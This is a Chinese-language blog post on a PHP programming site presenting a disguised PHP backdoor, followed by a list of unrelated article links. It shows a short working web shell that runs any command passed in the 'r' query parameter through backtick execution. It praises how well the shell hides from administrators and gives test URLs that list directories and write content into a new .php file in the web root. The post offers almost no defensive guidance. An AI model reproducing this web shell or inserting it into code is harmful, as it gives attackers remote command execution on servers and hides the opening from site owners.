首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

一个不易被发现的PHP后门代码解析

Posted in PHP onJuly 05, 2014

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>D:\web\90sec.php

我用 appserv 和虚拟主机已经测试成功。

一个不易被发现的PHP后门代码解析

- Author -

shichen2014

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
模拟OICQ的实现思路和核心程序(一)
Oct 09 PHP
php将数据库中的电话号码读取出来并生成图片
Aug 31 PHP
Windows Apache2.2.11及Php5.2.9-1的安装与配置方法
Jun 08 PHP
php5 图片验证码实现代码
Dec 11 PHP
PHPCMS的使用小结
Sep 20 PHP
ThinkPHP中处理表单中的注意事项
Nov 22 PHP
php下pdo的mysql事务处理用法实例
Dec 27 PHP
PHP编程中尝试程序并发的几种方式总结
Mar 21 PHP
在PHP语言中使用JSON和将json还原成数组的方法
Jul 19 PHP
PHP基于rabbitmq操作类的生产者和消费者功能示例
Jun 16 PHP
thinkphp框架实现路由重定义简化url访问地址的方法分析
Apr 04 PHP
基于PHP的登录和注册的功能的实现
Aug 06 PHP
linux下使用crontab实现定时PHP计划任务失败的原因分析
Jul 05 #PHP
php操作redis中的hash和zset类型数据的方法和代码例子
Jul 05 #PHP
采用memcache在web集群中实现session的同步会话
Jul 05 #PHP
30个php操作redis常用方法代码例子
Jul 05 #PHP
PHP在网页中动态生成PDF文件详细教程
Jul 05 #PHP
PHP数组遍历知识汇总(包含遍历方法、数组指针操作函数、数组遍历测速)
Jul 05 #PHP
php遍历数组的4种方法总结
Jul 05 #PHP
logging(1) netty(1) 解密(1) hashlib(1) 加密(1) apt命令(1) NoSQL(1) Pickle(1) 类加载器(1) Launch Mode(1)
You might like
CodeIgniter集成smarty的方法详解
2016/05/26 PHP
php处理复杂xml数据示例
2016/07/11 PHP
微信支付开发维权通知实例
2016/07/12 PHP
使用composer 安装 laravel框架的方法图文详解
2019/08/02 PHP
不一样的文字闪烁 轮番闪烁
2009/11/11 Javascript
IE浏览器IFrame对象内存不释放问题解决方法
2014/08/22 Javascript
js实现同一页面多个不同运动效果的方法
2015/04/10 Javascript
js简单实现竖向tab选项卡的方法
2015/05/04 Javascript
JS实现带缓冲效果打开、关闭、移动一个层的方法
2015/05/09 Javascript
javascript自动切换焦点控制效果完整实例
2016/02/02 Javascript
jQuery中$.ajax()方法参数解析
2016/10/22 Javascript
AngularJS路由实现页面跳转实例
2017/03/03 Javascript
xmlplus组件设计系列之分隔框(DividedBox)(8)
2017/05/02 Javascript
Vue组件之自定义事件的功能图解
2018/02/01 Javascript
[01:01]青春无憾,一战成名——DOTA2全国高校联赛开启
2018/02/25 DOTA
python实现将文本转换成语音的方法
2015/05/28 Python
python统计日志ip访问数的方法
2015/07/06 Python
python实现超简单的视频对象提取功能
2018/06/04 Python
Python实现银行账户资金交易管理系统
2020/01/03 Python
Django mysqlclient安装和使用详解
2020/09/17 Python
python实现图像高斯金字塔的示例代码
2020/12/11 Python
python实现三种随机请求头方式
2021/01/05 Python
jupyter notebook更换皮肤主题的实现
2021/01/07 Python
纯CSS改变webkit内核浏览器的滚动条样式
2014/04/17 HTML / CSS
详解如何使用CSS3中的结构伪类选择器和伪元素选择器
2020/01/06 HTML / CSS
俄罗斯运动鞋商店:Sneakerhead
2018/05/10 全球购物
Perfume’s Club德国官网:在线购买香水
2019/04/08 全球购物
中国包裹转运寄送国际服务:Famiboat
2019/07/24 全球购物
美国家居装饰店:Pier 1
2019/09/04 全球购物
瑞典耳机品牌:URBANISTA
2019/12/03 全球购物
override和overload的区别
2016/03/09 面试题
后勤工作职责
2013/12/22 职场文书
生物技术专业求职信
2014/06/10 职场文书
解决Tkinter中button按钮未按却主动执行command函数的问题
2021/05/23 Python
Redis高并发防止秒杀超卖实战源码解决方案
2021/11/01 Redis
Python之matplotlib绘制折线图
2022/04/13 Python